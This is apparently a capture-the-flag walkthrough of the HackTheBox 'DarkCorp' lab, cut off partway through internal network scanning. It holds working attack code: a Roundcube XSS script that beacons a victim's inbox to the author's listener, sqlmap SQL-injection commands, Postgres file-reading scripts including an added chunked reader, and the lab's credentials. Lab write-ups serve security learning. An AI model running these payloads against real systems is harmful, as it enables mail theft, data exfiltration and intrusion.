DarkCorp

Recon

nmap_scan.log

HTTP (80)

Writeup.png

RoundCube

On /register we can sign up, and on mail.drip.htb we can log in to the RoundCube webmail with the new account.

Creds: test02:test02

Writeup-1.png

RoundCube version is 1.6.7

Writeup-2.png

Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail

Unintended Sidetrack

You can register as almost any username; registering as root lets us log in and read the cronjob reports mailed to root...

Writeup-4.png

drip.darkcorp.htb redirects to drip.htb

There are 2 users: ebelford and support

Directory brute-forcing (feroxbuster) reveals that the vhost serves a second application under /dashboard:

└─$ feroxbuster -u 'http://drip.darkcorp.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -D -C 404,403,400 -S 0,34
200      GET        1l        5w       64c http://drip.darkcorp.htb/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard => http://drip.darkcorp.htb/dashboard/
200      GET        1l        5w       64c http://drip.darkcorp.htb/index.html
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps => http://drip.darkcorp.htb/dashboard/apps/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/media => http://drip.darkcorp.htb/dashboard/media/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/authentication => http://drip.darkcorp.htb/dashboard/apps/authentication/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/home => http://drip.darkcorp.htb/dashboard/apps/home/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/static => http://drip.darkcorp.htb/dashboard/apps/static/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates => http://drip.darkcorp.htb/dashboard/apps/templates/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/accounts => http://drip.darkcorp.htb/dashboard/apps/templates/accounts/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/static/assets => http://drip.darkcorp.htb/dashboard/apps/static/assets/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/home => http://drip.darkcorp.htb/dashboard/apps/templates/home/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/includes => http://drip.darkcorp.htb/dashboard/apps/templates/includes/
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard/apps/templates/layouts => http://drip.darkcorp.htb/dashboard/apps/templates/layouts/
[####################] - 3m     73512/73512   0s      found:14      errors:0
[####################] - 12s     7256/7256    621/s   http://drip.darkcorp.htb/
[####################] - 2m      9411/9411    70/s    http://drip.darkcorp.htb/dashboard/
[####################] - 78s     4733/4733    61/s    http://drip.darkcorp.htb/dashboard/apps/
[####################] - 78s     4733/4733    61/s    http://drip.darkcorp.htb/dashboard/media/
[####################] - 85s     4733/4733    56/s    http://drip.darkcorp.htb/dashboard/apps/authentication/
[####################] - 86s     4733/4733    55/s    http://drip.darkcorp.htb/dashboard/apps/home/
[####################] - 82s     4733/4733    58/s    http://drip.darkcorp.htb/dashboard/apps/static/
[####################] - 85s     4733/4733    56/s    http://drip.darkcorp.htb/dashboard/apps/templates/ 

└─$ feroxbuster -u 'http://drip.darkcorp.htb/dashboard' -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34
301      GET        7l       11w      169c http://drip.darkcorp.htb/dashboard => http://drip.darkcorp.htb/dashboard/
200      GET       32l       86w      796c http://drip.darkcorp.htb/dashboard/.env
[####################] - 8s      2635/2635    0s      found:2       errors:2
[####################] - 7s      2623/2623    373/s   http://drip.darkcorp.htb/dashboard/ 

You could read http://drip.darkcorp.htb/dashboard/.env and any other source file you could find.

Probably unintended, so I didn't follow this path.

XSS - CVE-2024-42009

While testing for CVE-2024-42009 I messed up the recipient and got an email about the user not existing; potential user enumeration if support fails?

Writeup-3.png

Hmmm... playing around with XSS yielded nothing using the payload from the blog.

On the main page, /contact sends emails to a specified recipient.

Writeup-5.png

Test whether we can receive it, and yes:

Writeup-6.png

I used the following script to test many payloads, but none worked.

from os import urandom
import requests
from bs4 import BeautifulSoup as BS

URL = 'http://mail.drip.htb/'
USERNAME, PASSWORD = "test02", "test02"
SENDER = f"{USERNAME}@drip.htb"


def login(session, username, password):
    # Roundcube protects the login form with a CSRF token; fetch it first.
    resp = session.get(URL, params={'_task': 'login'})
    token = BS(resp.text, 'html.parser').find('input', {'name': '_token'})
    if not token:
        raise Exception('Unable to find CSRF token on the login page.')

    payload = {
        '_token': token['value'],
        '_task': 'login',
        '_action': 'login',
        '_user': username,
        '_pass': password
    }
    login_response = session.post(URL, data=payload)

    # A failed login lands back on the login page.
    if 'login' in login_response.url:
        raise Exception('Login failed. Please check your credentials.')


def send_email(session, sender, recipient, subject, message):
    # The compose page issues a fresh CSRF token and a compose ID (_id) that the send action requires.
    resp = session.get(URL, params={'_task': 'mail', '_action': 'compose'})
    html = BS(resp.text, 'html.parser')
    token = html.find('input', {'name': '_token'})
    id_ = html.find('input', {'name': '_id'})
    if not token or not id_:
        raise Exception('Unable to find CSRF token or compose ID on the compose page.')

    send_data = {
        '_token': token['value'],
        '_task': 'mail',
        '_action': 'send',
        '_id': id_['value'],
        '_from': sender,
        '_to': recipient,
        '_cc': sender,            # copy ourselves so the rendered result can be inspected in our own inbox
        '_subject': subject,
        '_is_html': 1,            # send as HTML, otherwise the payload is escaped as plain text
        '_framed': 1,
        'editorSelector': 'html',
        '_message': message
    }
    send_response = session.post(URL, data=send_data)

    if 'message sent' in send_response.text.lower():
        print('Email sent successfully.')
    else:
        raise Exception('Failed to send the email.')


recipient = 'bcase@drip.htb'       # target mailbox (use f"{USERNAME}@drip.htb" to test against ourselves)
subject = urandom(8).hex()         # random subject so each test mail is easy to tell apart
# Payload from the CVE-2024-42009 blog post. \u00a0 is the non-breaking space the blog's payload
# contains; written as "\xC2\xA0" in a Python str it becomes 'Â' + NBSP, not the UTF-8 bytes.
message = """
<body title="bgcolor=foo" name="bar onload=alert(origin)">
\u00a0Foo
</body>
"""

with requests.Session() as session:
    session.proxies = {'http': 'http://127.0.0.1:8080'}   # route through Burp for inspection

    login(session, USERNAME, PASSWORD)

    send_email(session, SENDER, recipient, subject, message)

Going back to the contact form: it has a field content=text; if switched to html then this XSS works.... ???

If we send to a non-existent email then it ends up in our mailbox (the email field (?)) as a failed send; here we get self-XSS because it failed, but it confirms that XSS works from /contact.

Writeup-7.png

The support user does not generate a callback, but the bcase user does.

└─$ ncat -lvnkp 80
Ncat: Connection from 10.129.40.174:49956.
GET / HTTP/1.1
Host: 10.10.14.20
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: http://mail.drip.htb
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Script:

from base64 import b64encode
import requests

URL = 'http://drip.htb/contact'

# JS executed in bcase's browser: pull the inbox listing and beacon it to our listener.
payload = '''
const C2 = "http://10.10.14.20"
fetch("/?_task=mail&_action=list&_remote=1")
.then(resp => resp.text())
.then(resp => navigator.sendBeacon(C2, resp))
'''
data = {
    'name': 'test02',
    'email': 'test02@drip.htb',
    # Attribute-injection payload (CVE-2024-42009 style): the CSS animation event fires
    # without any user interaction, and the JS is base64'd so quoting inside the attribute is not an issue.
    'message': """<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob(`%s`)) foo=bar">Foo</body>""" % b64encode(payload.encode()).decode(),
    'content': 'html',             # the contact form must send HTML, not text
    'recipient': 'bcase@drip.htb',
}

requests.post(URL, data=data)

The beacon delivers the list action's response:

this.add_message_row(3,{"subject":"Customer Information Request","fromto":"<span class=\\"adr\\"><span title=\\"test02@drip.htb\\" class=\\"rcmContactAddress\\">test02<\/span><\/span>","date":"Today 16:00","size":"2 KB"},{"seen":1,"ctype":"multipart\/mixed","mbox":"INBOX"},false);
this.add_message_row(2,{"subject":"Analytics Dashboard","fromto":"<span class=\\"adr\\"><span title=\\"ebelford@drip.htb\\" class=\\"rcmContactAddress\\">ebelford<\/span><\/span>","date":"2024-12-24 13:38","size":"1 KB"},{"seen":1,"ctype":"text\/plain","mbox":"INBOX"},false);
this.add_message_row(1,{"subject":"Welcome to DripMail","fromto":"<span class=\\"adr\\"><span title=\\"no-reply@drip.htb\\" class=\\"rcmContactAddress\\">no-reply@drip.htb<\/span><\/span>","date":"2024-12-20 12:43","size":"687 B"},{"seen":1,"ctype":"","mbox":"INBOX"},false);

This user has 2 mails and then ours. The welcome email can be discarded; "Analytics Dashboard" from ebelford@drip.htb is interesting.

Read the email using the preview action: fetch("/?_task=mail&_uid=2&_mbox=INBOX&_framed=1&_action=preview")

The UID is the first argument of add_message_row in the list action's output (2 for the Analytics Dashboard mail).

Writeup-8.png

More XSS - Forgot Password

http://dev-a3f1-01.drip.htb/

Writeup-9.png

We can't log in; only bcase can. There's a Forgot Password on the platform which requires an email.

Writeup-10.png

Send it and list the emails again:

this.add_message_row(3,{\"subject\":\"Reset token\",\"fromto\":\"<span class=\\\"adr\\\"><span title=\\\"no-reply@drip.htb\\\" class=\\\"rcmContactAddress\\\">no-reply@drip.htb</span></span>\",\"date\":\"Today 17:00\",\"size\":\"928 B\"},{\"seen\":1,\"ctype\":\"text/plain\",\"mbox\":\"INBOX\"},false)

Read the email:

Writeup-11.png

http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z6fxAA.W9dAyVvWlL82g0CDFyPAK832d98

Creds: bcase:Password123$

SQLi (Postgres)

Writeup-12.png

Searching for test crashed the app (?)

Writeup-13.png

The crash reveals Psycopg (the most popular PostgreSQL database adapter for Python), so the backend is PostgreSQL and this looks like SQLi. Reference: PayloadsAllTheThings/SQL Injection/PostgreSQL Injection

1 OR 1=1 -- -   # Fail
'1' OR 1=1 -- - # Success

The parameter is evidently concatenated into the query unquoted (sqlmap's working payload below also starts with '' AND ...): a bare 1 compares a text column against an integer and errors, while the quoted '1' is a valid literal.

Get tables (using the default database):

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch --tables
Database: public
[1 table]
+--------------------------+
| pg_subscription          |
+--------------------------+

Database: pg_catalog
[22 tables]
+--------------------------+
| pg_am                    |
| pg_amop                  |
| pg_amproc                |
| pg_attrdef               |
| pg_authid                |
| pg_catalog               |
| pg_class                 |
| pg_constraint            |
| pg_database              |
| pg_foreign_server        |
| pg_index                 |
| pg_largeobject_metadata  |
| pg_opclass               |
| pg_operator              |
| pg_opfamily              |
| pg_parameter_acl         |
| pg_range                 |
| pg_statistic             |
| pg_statistic_ext_data    |
| pg_subscription          |
| pg_ts_parser             |
| pg_user_mapping          |
+--------------------------+

Database: pg_am
[2 tables]
+--------------------------+
| pg_amproc                |
| pg_statistic_ext         |
+--------------------------+

Database: pg_amproc
[4 tables]
+--------------------------+
| pg_cast                  |
| pg_catalog               |
| pg_conversion            |
| pg_depend                |
+--------------------------+

Database: pg_cast
[3 tables]
+--------------------------+
| pg_cast                  |
| pg_database              |
| pg_tablespace            |
+--------------------------+

Database: pg_database
[4 tables]
+--------------------------+
| pg_catalog               |
| pg_ts_config             |
| pg_ts_config_map         |
| pg_ts_dict               |
+--------------------------+

Database: pg_tablespace
[1 table]
+--------------------------+
| pg_ts_config_map         |
+--------------------------+

Database: pg_range
[2 tables]
+--------------------------+
| pg_publication_namespace |
| pg_publication_rel       |
+--------------------------+

Database: information_schema
[2 tables]
+--------------------------+
| pg_publication_rel       |
| sql_sizing               |
+--------------------------+

List databases, since the default one is empty:

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch --dbs
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

List the public database:

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch -D public --tables
Database: public
[2 tables]
+--------+
| Admins |
| Users  |
+--------+

Dumping the tables doesn't return anything...

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=BUE --batch -D public --dump --no-cast
[*] starting @ 19:29:36 /2025-02-08/

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[19:29:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: query='' AND 9033=CAST((CHR(113)||CHR(112)||CHR(106)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (9033=9033) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC) AND 'SMUP'='SMUP'
---
[19:29:38] [INFO] testing PostgreSQL
[19:29:38] [INFO] confirming PostgreSQL
[19:29:38] [INFO] the back-end DBMS is PostgreSQL
web application technology: Nginx 1.22.1
back-end DBMS: PostgreSQL
[19:29:38] [INFO] fetching tables for database: 'public'
[19:29:38] [INFO] starting 2 threads
[19:29:38] [INFO] resumed: 'Users'
[19:29:38] [INFO] resumed: 'Admins'
[19:29:38] [INFO] fetching columns for table 'Admins' in database 'public'
[19:29:38] [INFO] starting 4 threads
[19:29:38] [INFO] resumed: 'id'
[19:29:38] [INFO] resumed: 'password'
[19:29:38] [INFO] resumed: 'email'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] resumed: 'int4'
[19:29:38] [INFO] resumed: 'username'
[19:29:38] [INFO] resumed: 'varchar'
[19:29:38] [INFO] fetching entries for table 'Admins' in database 'public'
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
got a 302 redirect to 'http://dev-a3f1-01.drip.htb/analytics'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[19:29:39] [WARNING] reflective value(s) found and filtering out
[19:29:39] [WARNING] the SQL query provided does not return any output
[19:29:39] [WARNING] unable to retrieve the entries for table 'Admins' in database 'public'
[19:29:39] [INFO] fetching columns for table 'Users' in database 'public'
[19:29:39] [INFO] starting 6 threads
[19:29:39] [INFO] resumed: 'email'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'host_header'
[19:29:39] [INFO] resumed: 'id'
[19:29:39] [INFO] resumed: 'ip_address'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'username'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'varchar'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] resumed: 'password'
[19:29:39] [INFO] fetching entries for table 'Users' in database 'public'
[19:29:40] [WARNING] the SQL query provided does not return any output
[19:29:40] [WARNING] unable to retrieve the entries for table 'Users' in database 'public'
[19:29:40] [INFO] fetched data logged to text files under '/home/woyag/.local/share/sqlmap/output/dev-a3f1-01.drip.htb'

[*] ending @ 19:29:40 /2025-02-08/

SQLi -> LFI

Postgres allows reading (pg_read_file) and writing (COPY ... TO) files on the server, subject to the privileges of the database role.

└─$ sqlmap -u 'http://dev-a3f1-01.drip.htb/analytics' -H 'Cookie: session=.eJwljjFuAzEMBP-iOoVIkRTlzxwokYSNAAlwZ1dB_m4FwVY7zcxPOfKM615uz_MVH-V4eLkV7SFAskyXsDSYMPrijF6JkoP7Jg18YLIlBJPnRLCpronLqCpB1wbNAVVT16KZJOSzAYdNcekDzMQVo7qwIiYwU9IUaKPskNcV538N7LuuM4_n92d8_YGovBwtGKNTJ9irO602ixFt-1uGVSu_b5l3Pmw.Z6fzTg.fjMYjdvG9HlCiV0nO63Rmg9l2xQ' --data "query='*'" --threads=10 --dbms=Postgres --technique=E --batch --sql-shell --hex
sql-shell> select pg_read_file('/etc/passwd', 0, 2000);
...
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
...

Hmmmm... even if we could write files, we can't do anything with them.

/etc/hosts

127.0.0.1 localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb

There are other hosts on the network; I kind of forgot this was a Windows machine.

Read files (error-based: the ::int cast makes Postgres echo the file contents in the error message, which the app flashes into the session cookie):

import re
import readline  # noqa: F401  (line editing/history for the input() prompt)
from requests import Session
from bs4 import BeautifulSoup as BS
from flask_unsign import decode

URL = 'http://dev-a3f1-01.drip.htb'
USERNAME, PASSWORD = 'bcase', 'Password123$'

with Session() as session:
    # Flask-WTF login form: grab the CSRF token, then authenticate as bcase.
    csrf_token = BS(session.get(f'{URL}/login').text, 'html.parser').find('input', {'id': 'csrf_token'})['value']
    session.post(f'{URL}/login', data={'csrf_token': csrf_token, 'username': USERNAME, 'password': PASSWORD, 'login': ''})

    while True:
        file = input('File To Read: ')
        # Casting the file contents to int fails and Postgres quotes the offending value in the error.
        resp = session.post(f'{URL}/analytics', data={'query': f"'' AND (SELECT pg_read_file('{file}'))::int=1 -- -"}, allow_redirects=False)
        # Flask flashes live in the session cookie, which is signed but not encrypted,
        # so flask-unsign can decode them without knowing the secret key.
        flash = decode(resp.cookies.get('session'))['_flashes'][-1][-1]
        # Greedy match up to the last quote: a non-greedy match would stop at the first " inside the file.
        result = re.search('"(.*)"', flash, re.DOTALL).group(1).strip()
        print(result)
        print('- ' * 32)

Nothing so far with the LFI...

The logs seem interesting - https://hacktricks.boitatech.com.br/pentesting/pentesting-postgresql

https://learnomate.org/documentation-of-postgresql-conf-file/

The location of the postgresql.conf file can vary depending on the operating system and the installation method. Common locations include:

  • /etc/postgresql/<version>/main/postgresql.conf (Debian/Ubuntu)

  • /var/lib/pgsql/<version>/data/postgresql.conf (CentOS/Red Hat)

  • /usr/local/pgsql/data/postgresql.conf (custom source installations)

To leak the version use '' AND (SELECT version())::int=1 -- -

Writeup-14.png

When I attempt to read /etc/postgresql/15/main/postgresql.conf the application crashes with a 502... The sqlmap payload was successful at reading the file, but only managed to read up to 5500 bytes (not enough to reach the log config).

The default log location for version 15 seems to be /var/log/postgresql/postgresql-15-main.log:
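Added example (my code, not from the original notes): how I'd chunk the read so large files such as postgresql.conf come back without tripping the 502 above. It keeps the error-based ::int trick and the flash-cookie extraction of the reader script, but swaps pg_read_file for encode(pg_read_binary_file(path, offset, length), 'base64'): same privilege requirement, bounded output per request, and no UTF-8 validation failure when a chunk boundary splits a multibyte character. The exact error-message prefix and the fake_oracle stand-in are assumptions so the block runs offline; http_oracle is what you would point at /analytics with a logged-in requests.Session.

```python
import base64
import re

# Message PostgreSQL raises for ''::int, '<file contents>'::int, etc. (assumed to reach us verbatim).
INT_ERR = 'invalid input syntax for type integer: "'


def leak_payload(sql_expr):
    """Injection for the unquoted query parameter: '' is an empty string literal, and
    casting the expression's text result to int makes PostgreSQL quote it in the error."""
    return "'' AND (SELECT (%s))::int=1 -- -" % sql_expr


def extract_leak(error_text):
    """Pull <value> out of 'invalid input syntax for type integer: "<value>"'.
    Assumes the app surfaces the raw psycopg error text, as the reader above relies on."""
    i = error_text.find(INT_ERR)
    if i < 0:
        return None
    rest = error_text[i + len(INT_ERR):].rstrip()
    j = rest.rfind('"')            # the value may itself contain quotes, so take the last one
    return rest[:j] if j >= 0 else rest


def read_file_chunked(oracle, path, chunk=1024):
    """Read a server-side file through an error oracle in fixed-size pieces.

    pg_read_binary_file(path, offset, length) bounds every response, and base64 keeps the
    leaked text ASCII, so a chunk boundary inside a multibyte character cannot make
    pg_read_file()'s encoding check reject the read."""
    data = bytearray()
    offset = 0
    while True:
        leaked = oracle("encode(pg_read_binary_file('%s', %d, %d), 'base64')" % (path, offset, chunk))
        if leaked is None:
            raise RuntimeError("no integer-cast error in response at offset %d" % offset)
        piece = base64.b64decode("".join(leaked.split()))   # encode(..., 'base64') wraps lines at 76 chars
        data += piece
        if len(piece) < chunk:     # short read: end of file
            break
        offset += chunk
    return bytes(data)


def http_oracle(session, url):
    """Oracle against the real /analytics endpoint, reusing the flash-cookie trick of the
    reader above (needs a logged-in requests.Session and flask-unsign)."""
    from flask_unsign import decode   # imported lazily so the offline demo needs no extra deps

    def oracle(expr):
        resp = session.post(url, data={"query": leak_payload(expr)}, allow_redirects=False)
        flashes = decode(resp.cookies.get("session")).get("_flashes") or []
        return extract_leak(flashes[-1][-1]) if flashes else None
    return oracle


def fake_oracle(files):
    """Offline stand-in for the target: answers the one expression shape read_file_chunked()
    sends with the same error text PostgreSQL/psycopg would produce."""
    pat = re.compile(r"encode\(pg_read_binary_file\('([^']+)', (\d+), (\d+)\), 'base64'\)")

    def oracle(expr):
        m = pat.fullmatch(expr)
        path, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
        b64 = base64.b64encode(files[path][off:off + ln]).decode()
        wrapped = "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
        return extract_leak('%s%s"\n' % (INT_ERR, wrapped))
    return oracle


if __name__ == "__main__":
    # Constructed sample files, not from the target.
    demo = fake_oracle({"/etc/hostname": b"drip\n", "/tmp/big": bytes(range(256)) * 40})
    print(read_file_chunked(demo, "/etc/hostname", chunk=2))
    print(len(read_file_chunked(demo, "/tmp/big", chunk=1000)), "bytes")
```

With the real target, build the session exactly as the reader script does (CSRF token, then login as bcase) and call read_file_chunked(http_oracle(session, URL + '/analytics'), '/etc/postgresql/15/main/postgresql.conf').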

sql-shell> SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 10000)
[21:56:00] [INFO] fetching SQL SELECT statement query output: 'SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 10000)'
...
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail ERROR:  trailing junk after numeric literal at or near "8bbd7f88841b4223ae63c8848969be86" at character 29
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT:  UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
...

https://crackstation.net -> 8bbd7f88841b4223ae63c8848969be86 -> ThePlague61780

SSH (22)

Creds: ebelford:ThePlague61780

└─$ sshpass -p 'ThePlague61780' ssh ebelford@drip.htb
You have no mail.
Last login: Wed Feb  5 16:40:19 2025 from 172.16.20.1
ebelford@drip:~$ id
uid=1002(ebelford) gid=1002(ebelford) groups=1002(ebelford)
ebelford@drip:~$ ls -alh
total 8.0K
drwxr-xr-x 2 ebelford ebelford 4.0K Feb  5 12:49 .
drwxr-xr-x 5 root     root     4.0K Feb  3 10:46 ..
lrwxrwxrwx 1 root     root        9 Feb  3 10:47 .bash_history -> /dev/null

Postgres

ebelford@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False

# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development

# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>

# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets

# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'

Enumerate Postgres

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c 'SELECT username,password FROM "Users";'
 username |             password
----------+----------------------------------
 support  | d9b9ecbf29db8054b21f303072b37c4e
 bcase    | 1eace53df87b9a15a37fdc11da2d298d
 ebelford | 0cebd84e066fd988e89083879e88c5f9

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c 'SELECT username,password FROM "Admins";'
 username |             password
----------+----------------------------------
 bcase    | dc5484871bc95c4eab58032884be7225

None of the hashes are found in the CrackStation database...

Network Enumeration~

We just got an entry point into the network, and if you remember there were 2 other hosts in /etc/hosts. We can upload nmap and start scanning them.

ebelford@drip:/tmp$ ip -brief address show
lo               UNKNOWN        127.0.0.1/8
eth0             UP             172.16.20.3/24

There are only these 3 devices on the network (confirmed by the ping sweep below).

└─$ curl -LOs https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
└─$ sshpass -p 'ThePlague61780' scp ./nmap ebelford@drip.htb:/tmp/nmap
ebelford@drip:/var/www/html$ chmod +x /tmp/nmap
ebelford@drip:/var/www/html$ touch nmap-services   # the static binary wants nmap-services next to it; an empty file is enough (hence SERVICE=unknown below)
ebelford@drip:/var/www/html$ /tmp/nmap -sn 172.16.20.0/24
Nmap scan report for DC-01 (172.16.20.1) # DC01
Host is up (0.0012s latency).
Nmap scan report for 172.16.20.2 # Unknown
Host is up (0.0018s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3) # We are 3!
Host is up (0.00017s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.41 seconds

ebelford@drip:/tmp$ ./nmap -Pn -p- -T5 --min-rate=1000 --open 172.16.20.1

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-08 21:08 MST
Cannot find nmap-payloads. UDP payloads are disabled.
channel 2: open failed: connect failed: Temporary failure in name resolution
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0035s latency).
Not shown: 65506 filtered ports
PORT      STATE SERVICE
22/tcp    open  unknown
53/tcp    open  unknown
80/tcp    open  unknown
88/tcp    open  unknown
135/tcp   open  unknown
139/tcp   open  unknown
389/tcp   open  unknown
443/tcp   open  unknown
445/tcp   open  unknown
464/tcp   open  unknown
593/tcp   open  unknown
636/tcp   open  unknown
2179/tcp  open  unknown
3268/tcp  open  unknown
3269/tcp  open  unknown
5985/tcp  open  unknown
9389/tcp  open  unknown
47001/tcp open  unknown
49384/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49678/tcp open  unknown
53491/tcp open  unknown
55569/tcp open  unknown
55579/tcp open  unknown
55596/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 52.45 seconds
ebelford@drip:/tmp$ ./nmap -Pn -p- -T5 --min-rate=1000 --open 172.16.20.2

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-08 21:09 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Warning: 172.16.20.2 giving up on port because retransmission cap hit (2).
Nmap scan report for 172.16.20.2
Host is up (0.0033s latency).
Not shown: 65453 closed ports, 67 filtered ports
PORT      STATE SERVICE
80/tcp    open  unknown
135/tcp   open  unknown
139/tcp   open  unknown
